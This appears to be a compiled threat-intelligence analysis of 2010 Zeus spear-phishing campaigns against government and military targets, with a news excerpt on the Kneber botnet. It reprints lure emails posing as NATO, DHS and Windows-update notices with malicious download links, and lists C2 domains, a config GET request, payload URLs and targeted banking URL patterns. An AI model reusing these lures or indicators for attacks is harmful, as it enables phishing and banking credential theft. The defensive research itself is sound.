detection technology to this area. This assessment examined a number of unclassified
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults
conducted in the public areas of airports from the 1960s to the present. Additionally,
attacks on other critical infrastructure targets were reviewed in order to assess which
tactics are more likely to be considered by terrorists targeting airport terminals.

Additional information can be found in the following report:

http://www.christianrantsen.dk/report.zip

http://enigmazones.eu/report.zip

________________________________________
Department of Homeland Security
Office of Infrastructure Protection
Infrastructure Security Compliance Division
Mail Stop 8100
Washington, DC 20528

* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116

August 26, 2010
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html

From: ifc@ifc.nato.int
Date: Thu, 26 Aug 2010 08:24:30 -0500
Subject: From Intelligence Fusion Centre

Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB

FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU

Additional information can be found in the following report:

http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip

> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia – operation
> “Atalanta”, is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> – the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> – the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS – EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319

This post was inspired by a recent post at contagio.blogspot.com. What appears to be a one-off attack using Zeus, I believe, is actually another round of a series of Zeus attacks. These attacks appear to be aimed at those interested in intelligence issues and those in the government and military, although the targeting appears to be general rather than targeted.

Round 1

On February 6th, 2010, Brian Krebs reported that attackers using the Zeus trojan targeted a variety of .gov and .mil email addresses in a spear phishing attack that appeared to be from the National Security Agency and enticed users to download a report called the “2020 Project.” The command and control server used in the attacks was updatekernel.com.

Round 2

Following the publication of the article by Brian Krebs, attackers took portions of his article and used them as lure in further spear phishing attacks. Sophos Labs analyzed the sample that used Kreb’s post. A post on Intelfusion.com by Jeff Carr regarding the spear phishing attack was also used in another attack. I documented these attacks in “The ‘Kneber’ Botnet, Spear Phishing Attacks and Crimeware“. The key command and control server in this case was also updatekernel.com.

Round 3

In early March 2010, more emails began circulating, one of which encouraged users to download malware from dhsorg.org (222.122.60.186). This malware used greylogic.org (222.122.60.186) as a command and control server. In addition to sharing an IP address, both domain were registered by hilarykneber@yahoo.com. The attack continued using the domain names dhsinfo.info, greylogic.info, and intelfusion.info (abuseemaildhcp@gmail.com) which were hosted on 218.240.28.34. The domain names used in these attacks were variations of domain names owned by Jeff Carr who has aptly characterized these attacks as a “Poisoning The Well” attack.

Round 4

In June 2010 another campaign began. The lure of the attack emphasizes Jeff Carr’s book “Inside Cyber Warfare: Mapping the Cyber Underworld” with the text copied from http://www.stratcom.mil/reading_list/. The command and control server in this case was from-us-with-love.com.

Round 5

Mila Parkour recently posted details of an interesting attack on contagiodump.blogspot.com. The email used in the attack appeared to be from “ifc@ifc.nato.int” with the subject “Intelligence Fusion Centre” and contained links to a report EuropeanUnion_MilitaryOperations_EN.pdf that exploits CVE-2010-1240 in order to drop a ZeuS binary.

File name: EuropeanUnion_MilitaryOperations_EN.pdf
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
VT: 11/41 (26.8%)

File name: exe.exe
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
VT: 3/41 (7.3%)

File name: ntos.exe
MD5: 28c4648f05f46a3ec37d664cee0d84a8
VT: 4/39 (10.3%)

First, the ZeuS malware connects to from-us-with-love.info (91.216.141.171) to receive the Zeus config file. Second, the malware connects to vittles.mobi (174.132.255.10) to download an infostealer. Finally, the infostealer connects to nicupdate.com (85.31.97.194).

logic.exe
MD5: 4f47b495caae1db79987b34afc971eaa
VT: 3/ 42 (7.1%)

The domain name from-us-with-love.info was registered by “Maria Laguer” with the email address admin@from-us-with-love.info, which was also used to register from-us-with-love.com (the name is also associated with other ZeuS domain, see MDL). The decrypted ZeuS config file from from-us-with-love.info contains two additional domain names: enigmazones.eu and askkairatik.net. The domain names were used as part of a previous ZeuS campaign that used from-us-with-love.com as a command and control server. IN addition the location of the malware, quimeras.com.mx, was also used in a previous campaign that had from-us-with-love.com as the command and control server.

One of the email addresses (www-data@nighthunter.ath.cx) that was used to propagate the malware associated with enigmazones.eu also delivered the emails containing malware hosted on dhsorg.org, which was registered by the infamous hilarykneber@yahoo.com and used in attacks in May. The domain dhsorg.org was hosted on 222.122.60.186 along with greylogic.org which was used as a command and control server.

The boundaries between the online crime and espionage appear to be blurring making issues of attribution increasingly more complex. Are online criminals simply targeting those interested in intelligence issues as well as members of the government and military for fraud? Have they determined that they can exploit such persons for fraud in addition to selling and sensitive data acquired to those who would be in the market for such information? Or is the campaign more specifically oriented toward espionage using ZeuS and the malware ecosystem as convenient cover? While these questions are unlikely to be ever definitively answered, we can begin to assess qualitative changes in attacks by tracking them overtime and carefully linking together seemingly disparate peices of data. This post was made possible by a wide variety of sources that each posted components of these attacks. While there is a need to protect certain sources as well as operation security so that the “bad guys” are not tipped off and continued research into their malicious activities remains possible, information sharing remains a key component malware research.

Introduction

Targeted attacks, known as “spear phishing,” are increasingly exploiting government and military themes in order to compromise defense contractors in the Unites States. [1] In 2009, the Washington Post reported that unknown attackers were able to break into a defense contractor and steal documents pertaining to the Joint Strike Fighter being developed by Lockheed Martin Corp. [2] Google was compromised in January 2010 along with other hi-tech companies and defense contractors. [3] The problem is becoming increasingly severe. [4] In fact, the Department of Defense recently released a memo with plans to protect unclassified information passing through the networks of various contractors. [5] The memo recognizes the severity of the ongoing threat and seeks to:

Establish a comprehensive approach for protecting unclassified DoD information transiting or residing on unclassified DIB information systems and networks by incorporating the use of intelligence, operations, policies, standards, information sharing, expert advice and assistance, incident response, reporting procedures, and cyber intrusion damage assessment solutions to address a cyber advanced persistent threat. [5]

Netwitness revealed the existence of a Zeus-based botnet that had compromised over 74,000 computers around the world. Zeus is not a single botnet, rather it is a malware kit that allows anyone to easily create a botnet. It sells for $400 – $700 although there are older (and pirated) version that cost considerably less or are publicly available for download. [6] Typically, the Zeus malware is used to steal banking credentials. [7] Because of the proliferation of the Zeus kit there are a wide variety of actors using Zeus – there is no single Zeus botnet, there is no one group behind the attacks. [8] In fact, botnet operators will often use multiple types of malware. [9]

Netwitness found that the command and control infrastructure for this botnet was primarily based in China and most of the compromised computers were in Egypt, Mexico, Saudi Arabia, Turkey and the United States. In addition to stealing banking credentials, attackers are now targeting the social networking credentials of members of the government and military as well as the employees of Fortune 500 companies. Netwitness revealed that many of the US compromises included government networks as well as Fortune 500 enterprises. [10] News reports revealed that ten U.S government agencies were compromised and several high profile companies were named including Merck, Cardinal Health, Paramount Pictures and Juniper Networks. [11]

The use of crimeware infrastructure for spear phishing attacks is certainly not a new development. Anti-Virus (AV) companies and members of the security community have downplayed the Kneber botnet suggesting that there has long been AV protection for this type of attack and that there is nothing particularly new about this botnet. [12] Furthermore, they argue that Kneber is not a particularly large Zeus-based botnet either, implying that the Kneber botnet is not deserving of the attention it has received. [13] While the media attention paid to the Kneber botnet has often been alarmist and sometimes inaccurate, the anti-virus coverage of the malware used in this attack was low (18/41 on Virustotal) — despite the fact that it was the well known Zeus malware kit. The way in which some are suggesting that AV has long protected users from this threat is troubling. Moreover, focusing solely on Zeus and not additional malware downloaded after Zeus obscures the relationship between generic and targeted attacks.

These events indicate that attacks that are often considered to be criminal in nature, such as the targeting of banking credentials of individuals, also pose persistent threats to those in the government and military sectors. Moreover, it is well understood that these attackers aim to maximize their financial gain from such attacks. If the data ex-filtrated is not simply bank account and credit card numbers but also credentials that can be used to access the internal networks of the victims, why wouldn’t they also sell that information? [14] As Netwitness states:

They are well organized, have demonstrated technical sophistication on par with many intelligence services and do not forgo the opportunity for financial gain with the the information they collect. If they are collecting network credentials, it means they are using or selling them in an active underground economy – which may include sponsoring foreign intelligence services. What is easier? Designing a campaign like Operation Aurora, or simply purchasing access to your target companies? [15]

Moreover, Netwitness suggests that the attackers may have been after data other than simply banking, credit card or social networking credentials. In response to the critique from the security and AV community, Netwitness stated that “trivializing the damage done is simply disingenuous by anyone who has seen the types of data stolen from threats such as these.” [16] This implies that the data ex-filtrated by the attackers may have been particularly sensitive. In fact, the Wall Street Journal reported that:

At one company, the hackers gained access to a corporate server used for processing online credit-card payments. At others, stolen passwords provided access to computers used to store and swap proprietary corporate documents, presentations, contracts and even upcoming versions of software products. [17]

One can understand the AV and security communities skepticism. Zeus, after all, is very well known. However, our investigation found that not only were there high profile compromises, as suggested by Netwitness, but that the focus of the attack appears to have been the extraction of sensitive information,not just banking credentials.

IWM Investigation

Our investigation focused on a spear phishing campaign that is linked with the Kneber botnet that represents only a small portion of the Kneber botnet. We focused on a case in which the attackers took portion of blog posts by authors Brian Krebs and Jeff Carr (two prominent members of the security community) and used them as the content of their malicious emails. Numerous individuals with .gov and .mil email addresses were sent these spoofed emails that prompted them to download a security fix for Microsoft Windows. Our investigation revealed that Zeus was being used to infect targets within the government and military sectors with second instance of malware designed to ex-filtrate data from the compromised computers.

Instead of simply stealing banking, credit card and social networking credentials, the Zeus malware downloaded an additional piece of malware on to the compromised machines which focused on ex-filtrating sensitive documents. We found that at least 81 compromised computers that had uploaded a total of 1533 documents to the drop zone. We found sensitive contracts between defense contractors and the U.S. Military, documents relating to, among other issues, computer network operations, electronic warfare and defense against biological and chemical terrorism. We found the security plan for an airport in the Unites States as well as documents from a foreign embassy as well as a large UN-related international organization. In addition, the personal computers of employees with security clearances who work for a variety of companies and government agencies were compromised.

The sensitive data obtained from these attacks will likely be used to exploit these targets further as well as those within the targets’ social network. The contact information and documents obtained by the attacker will likely be used for further “spear phishing” attacks. But these attacks may signify the growing involvement of crimeware in targeted malware attacks for the purposes of extracting sensitive information that can be exploited for intelligence purposes . The profile of the organizations that were compromised and the nature of the ex-filtrated data indicate that the goal of these attacks was not simply stolen banking credentials – the typical target of the Zeus malware.

Furthermore, this case poses challenges to methods of attribution that interpret the geo-political motivation of the attackers and assess the geographic location of the attackers’ command and control infrastructure. Were these attacks simply part of an ongoing Zeus crimeware campaign? Or does the composition of the targets and the content of the ex-filtrated data indicate that this is less a case of crimeware and more a case of espionage? There is no easy answer.

A more detailed examination of our investigation

On February 6, 2010, Brian Krebs reported that attackers using the Zeus trojan targeted a variety of .gov and .mil email addresses in a spear phishing attack that appeared to be from the National Security Agency and enticed users to download a report called the “2020 Project.” [18]

Following the publication of the article by Brian Krebs, attackers took portions of his article and used them as lure in further spear phishing attacks. [19] Sophos Labs analyzed the sample that used Kreb’s post. [20] A post on Intelfusion.com by Jeff Carr regarding the spear phishing attack was also used in another attack. [21] The attackers used the blog posts of these individuals and spoofed their email addresses in order to make their malware seem convincing to the recipients of the spear phishing attack.

Spear Phising Email

From: jeffreyc@greylogic.us [mailto:jeffreyc@greylogic.us]
Sent: Wednesday, February 10, 2010 7:34 AM
To: [REDACTED]
Subject: Russian spear phishing attack against .mil and .gov employees

Russian spear phishing attack against .mil and .gov employees

A “relatively large” number of U.S. government and military employees are being taken in by a spear phishing attack which delivers a variant of the Zeus trojan. The email address is spoofed to appear to be from the NSA or InteLink concerning a report by the National Intelligence Council named the “2020 Project”. It’s purpose is to collect passwords and obtain remote access to the infected hosts.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an attacker to remotely compromise a computer running Microsoft(r) Windows(r) and gain complete control over it. You can help protect your computer by installing this update from Microsoft. After you install this item, you may have to restart your computer.

Download:

http://fcpra.org/downloads/winupdate.zip

or

http://www.sendspace.com/file/tj373l

__________

Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal
Investigator of Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffreyc@greylogic.us

According to a further post on Intelfusion.com, the header information from the email reveals that there were two email addresses used to send the malicious email nobody@abe.enixns.com and w63697@uw03.uniweb.no. [22]

This email was sent to .mil and .gov email addresses, including those at the following locations: [23]

Executive Office of the President
Office of the U.S. Trade Representative
US Agency for International Development
Dept of Agriculture
Department of the Interior
Department of Transportation
Federal Aviation Administration
Department of State
Department of Justice
US Marine Corps
Marine Corps Intelligence Activity
US Navy
Advanced Traceability and Control Program
Department of Defense
US Joint Forces Command
White House Military Office
Defense Logistics Agency
Defense Security Service
US Pacific Command
Joint IED Defeat Organization
Defense Logistics Agency
Defense Intelligence Agency
Defense Finance and Accounting Service

Malware Analysis

The following is an analysis of the malware sample downloaded from:

http://fcpra.org/downloads/winupdate.zip

(The malware samples at http://www.sendspace.com/file/tj373l and http://mv.net.md/update/update.zip were identical).

The malware sample was contained in a ZIP file:

MD5: 4fc8bb3fd8634085423e6e25448acfe1
Filname: winupdate.zip
Virustotal: 6/41 (14.63%)

http://www.virustotal.com/analisis/907f50968b1c324dd37cf545959b119a75fc93aee35a4b92d5b51803ecbfa4f5-1265821180

Opening the ZIP file reveals an executable:

MD5: 7c0d0a771a39a83a691ffb2e3b810e0a
Filename: KB823988.exe
Virustotal: 18/41 (43.90%)

http://www.virustotal.com/reanalisis.html?907f50968b1c324dd37cf545959b119a75fc93aee35a4b92d5b51803ecbfa4f5-1265991887

http://www.threatexpert.com/report.aspx?md5=7c0d0a771a39a83a691ffb2e3b810e0a

After running the executable, attempts are made to connect with a command and control server located in China over HTTP:

updatekernel.com
115.100.250.105

Screen capture of Zeus login page on updatekernel.com.

The command and control server is a known Zeus C&C server.[24] There are a wide variety of malware kits and associated domain names hosted on this server, as well as several neighbouring servers.[25] The following are active domain names on the same server (115.100.250.105).

Dancho Danchev has linked the email address “abuseemaildhcp@gmail.com” to a variety of criminal enterprises including “money mule recruitment” operations. [26] Netwitness indicated that there is a link between the “Kneber” botnet. The Knerber botnet is named after the email address used to register the command and control domain names, “hilarykneber@yahoo.com”. This email address has been linked to past crimeware activity as well. [27] The link between the domains registered to “abuseemaildhcp@gmail.com” and those registered to “hilarykneber@yahoo.com” appears to be a common command and control infrastructure.

There are two domain names www.globalunitrack.com and www.aeroninc.com both resolve to 59.53.91.102 which is where portions of the Kneber botnet are hosted. These domain names are also hosted on 115.100.250.105 which is where updatekernel.com is hosted.

There are also domain names registered by both email addresses hosted on the same IP addresses.

91.213.174.50
netname: VolgaHost
descr: PE Bondarenko Dmitriy Vladimirovich
country: RU

61.235.117.72
netname: CRGdSzS
country: CN
descr: China Railcom Guangdong Shenzhen Subbranch

There are a variety of other interesting connections between “stallvars” domain names and other email addresses which indicate that there are further connections between the domain names and IP infrastructure used by the attackers. [28] This particular botnet extends beyond just the domains registered by “hilarykneber@yahoo.com.”

Configuration File

The compromised machine downloads a Zeus configuration file. In this case the file was downloaded from:

GET /imgpic/x18d2/d8x16/x98x10.bin
Host: updatekernel.com

The decrypted contents of this file contain the typical banking services that Zeus targets. When visiting these sites Zeus adds additional fields to capture information from the compromised user. It also changes DNS setting for the domains of antivirus products to prevent users from receiving updates.

http://updatekernel.com/dbbck/fts.exe

http://updatekernel.com/templtes/a16ext/int3xs/s.php

http://updatekernel.com/imgs/clprof/rbs28.bin

https://www.gruposantander.es/*

https://internetbanking.gad.de/*/portal?bankid=*

https://www.vr-networld-ebanking.de/index.php?RZKZ=*&RZBK=*

https://finanzportal.fiducia.de/*?rzid=*&rzbk=*

https://*.banking.first-direct.com/*

https://banking.*.de/cgi/ueberweisung.cgi/*

*&tid=*
*&betrag=*

https://internetbanking.gad.de/banking/*

KktNrTanEnz

https://cipehb*.cdg.citibank.de/HomeBanking*?_D=WorkArea&*

https://www.vr-networld-ebanking.de/ebanking*Action=*

Schmetterling

https://finanzportal.fiducia.de/ebanking*Action=*

Schmetterling

https://finanzportal.fiducia.de/ebbg2/portal?token=*

*decBetrag=*
value_*

https://onlinebanking.norisbank.de/norisbank/*.do?method=*

https://www.dresdner-privat.de/servlet/*

*&CMD=stapelFreigeben&*

https://brokerage.comdirect.de/servlet/*TAN*

*transactionID=*

After the “check in” with the command and control server, another executable was downloaded:

MD5: fb82af794544359ee89c17d096fa35b7
Filename: stat.exe
Virustotal: 5/41 (12.20%)

http://www.virustotal.com/analisis/1336bca82ba370c8cf0967ed192cb1865e4f943fbb4ea4e2f6c2c9b98eb43723-1265964848

http://www.threatexpert.com/report.aspx?md5=fb82af794544359ee89c17d096fa35b7

Drop Zone

After running the executable, attempts are made to connect with a drop zone located in Belarus over FTP:

packupdate.com
86.57.246.177

After connecting to the drop zone, the following files were uploaded from the compromised computer to the drop zone:

• _C.dll – list fo files and directories in the “C:\” directory
• EXCEL9.XLS – blank excel document
• _hslib.dll – unique id for compromised computer
• _users.dll – list of users on the compromised computer
• WINWORD8.DOC – blank word document

The FTP server revealed that there were at least 81 compromised computers that had uploaded a total of 1533 documents to the drop zone.

While we did not find any classified data, there was sensitive information regarding contracts with private firms as well as government/military entities and project information including budgets and supplementary documentation from government/military sources. The data includes unclassified, but sensitive, documents on latest threats from law enforcement services around the world. There were also procedural documents, such as an airport’s security plan.

There were also several computers compromised that belong to individuals that hold Top Secret (SSBI) clearances. In addition, computers were compromised that belong to individuals that contain documents regarding “privileged” military documents. The personal computer of an investigator that conducts security clearance investigations was also compromised.

Conclusions

Despite the fact that no classified information appears to have been obtained, the data captured is valuable to the attackers. At a minimum the attackers can use the contacts and information in these documents to further exploit the targets. Social engineering, rather than technical proficiency, is what enables attackers to compromise these high value targets. Expect to see these documents used as malicious exploits targeted those who would be familiar with or interested in them.

The identity of the targets compromised in this attack, the focus on ex-filtrating data, and the content of the documents indicates that crimeware may be moving into the espionage industry and/or providing command and control infrastructure for those engage in such activities. While Zeus is normally associated with capturing banking and other credentials, it is being used to deliver a payload that focuses on extracting sensitive data. The use of a well known malware kit such as Zeus and crime-focused command and control infrastructure may be obscuring the nature and intent of the attackers. If this trend is in fact occurring, the use of crimeware infrastructure significantly impacts traditional methods of determining motivation and attribution in espionage investigations.

About Information Warfare Monitor

The Information Warfare Monitor is an advanced research activity tracking the emergence of cyberspace as a strategic domain. We are an independent research effort. Our mission is to build and broaden the evidence base available to scholars, policy makers, and others. We aim to educate and inform.

The Information Warfare Monitor is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in a Ottawa (Canada). The Secdev Group conducts field-based investigations and data gathering. Our advanced research and analysis facilities are located at the Citizen Lab.

Notes:

[1] http://www.businessweek.com/magazine/content/08_16/b4080032218430.htm
[2] http://online.wsj.com/article/SB10001424052748704398804575071103834150536.html
[3] http://www.wired.com/threatlevel/2010/01/google-hack-attack/
[4] http://www.businessweek.com/technology/content/jul2009/tc2009076_873512.htm
[5] http://www.dtic.mil/whs/directives/corres/pdf/520513p.pdf
[6] http://www.damballa.com/downloads/d_pubs/WP%20Many-to-Many%20Botnet%20Relationships%20(2009-05-21).pdf
[7] For a technical discussion see http://www.abuse.ch/?p=1192 , http://blog.threatexpert.com/2009/09/time-to-revisit-zeus-almighty.html and http://www.m86security.com/labs/i/Zbot-In-Your-Inbox,trace.1005~.asp
[8] http://www.fortiguard.com/analysis/zeusanalysis.html
[9] http://www.darkreading.com/security/client/showArticle.jhtml?articleID=217800596
[10] http://www.netwitness.com/resources/kneber.aspx
[11] http://online.wsj.com/article/SB10001424052748704398804575071103834150536.html http://www.nytimes.com/2010/02/19/technology/19cyber.html http://blogs.zdnet.com/security/?p=5508
[12] http://www.symantec.com/connect/fr/blogs/kneber-zeus
[13] http://www.krebsonsecurity.com/2010/02/zeus-a-virus-known-as-botnet/, http://blogs.zdnet.com/security/?p=5508, http://pandalabs.pandasecurity.com/kneber-another-bot-yet/, http://blog.scansafe.com/journal/2010/2/18/zeus-kneber-botnet-cache-discovered.html, http://www.sophos.com/blogs/gc/g/2010/02/19/zeus-kneber-botnet-unmasked/, http://blog.threatfire.com/2010/02/a-zbot-botnet-dubbed-kneber.html, http://www.symantec.com/connect/fr/blogs/kneber-zeus, http://www.f-secure.com/weblog/archives/00001887.html
[14] See, comment by Brian Krebs, http://www.krebsonsecurity.com/2010/02/zeus-a-virus-known-as-botnet/
[15] http://www.networkforensics.com/2010/02/18/move-over-china-here-comes-russia/
[16] http://www.networkforensics.com/2010/02/19/kneber-update/
[17] http://online.wsj.com/article/SB10001424052748704398804575071103834150536.html
[18] http://www.krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/
[19] http://www.krebsonsecurity.com/2010/02/warning-about-zeus-attack-used-as-lure/
[20] http://www.sophos.com/blogs/sophoslabs/?p=8654
[21] http://intelfusion.net/wordpress/2010/02/08/russian-spear-phishing-attack-against-mil-and-gov-employees/
[22] http://intelfusion.net/wordpress/2010/02/11/define-irony-a-phishing-attack-disguised-as-a-warning-from-an-infosec-author-about-a-phishing-attack/
[23] http://intelfusion.net/wordpress/2010/02/19/u-s-government-departments-and-agencies-hit-by-the-zeus-trojan/
[24] https://zeustracker.abuse.ch/monitor.php host=updatekernel.com&id=7f6a3e6d82935254f0eafd9dc4fa450a
[25] http://www.malwaredomainlist.com/mdl.php?search=115.100.250.&colsearch=All&quantity=50
[26] http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html, http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html, http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
[27] http://ddanchev.blogspot.com/2009/12/celebrity-themed-scareware-campaign_07.html
[28] http://www.malwareurl.com/search.php?domain=&s=stallvars&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

NetWitness said in a release that it had discovered the program last month while the company was installing monitoring systems. The company named it the Kneber botnet based on a username that linked the infected systems. The purpose appears to be to gather login credentials to online financial systems, social networking sites and e-mail systems, and then to transmit that information to the system’s controllers, the company said.

The company’s investigation determined that the botnet had been able to compromise both commercial and government systems, including 68,000 corporate login credentials. It has also gained access to e-mail systems, online banking accounts, Facebook, Yahoo, Hotmail and other social network credentials, along with more than 2,000 digital security certificates and a significant cache of personal identity information.

“These large-scale compromises of enterprise networks have reached epidemic levels,” said Amit Yoran, chief executive of NetWitness and former director of the National Cyber Security Division of the Department of Homeland Security. “Cyber criminal elements, like the Kneber crew, quietly and diligently target and compromise thousands of government and commercial organizations across the globe.”

The company, which is based in Herndon, Va., noted that the new botnet made sophisticated use of a well-known Trojan Horse — a backdoor entryway to attack — that the computer security community had previously identified as ZeuS.

“Many security analysts tend to classify ZeuS solely as a Trojan that steals banking information,” said Alex Cox, the principal analyst at NetWitness responsible for uncovering the Kneber botnet. “But that viewpoint is naïve. When we began to detect the correlation among both the methodology used by the Kneber crew to attack victim machines and the wide variety of data sets harvested, it became clear that security teams must rethink their entire perspective on advanced threats such as ZeuS.”

Half of the machines infected with the Kneber botnet were also infected by an earlier botnet known as Waledec, the company noted.

The existence of the botnet was first reported by The Wall Street Journal, shortly before the company issued its news release.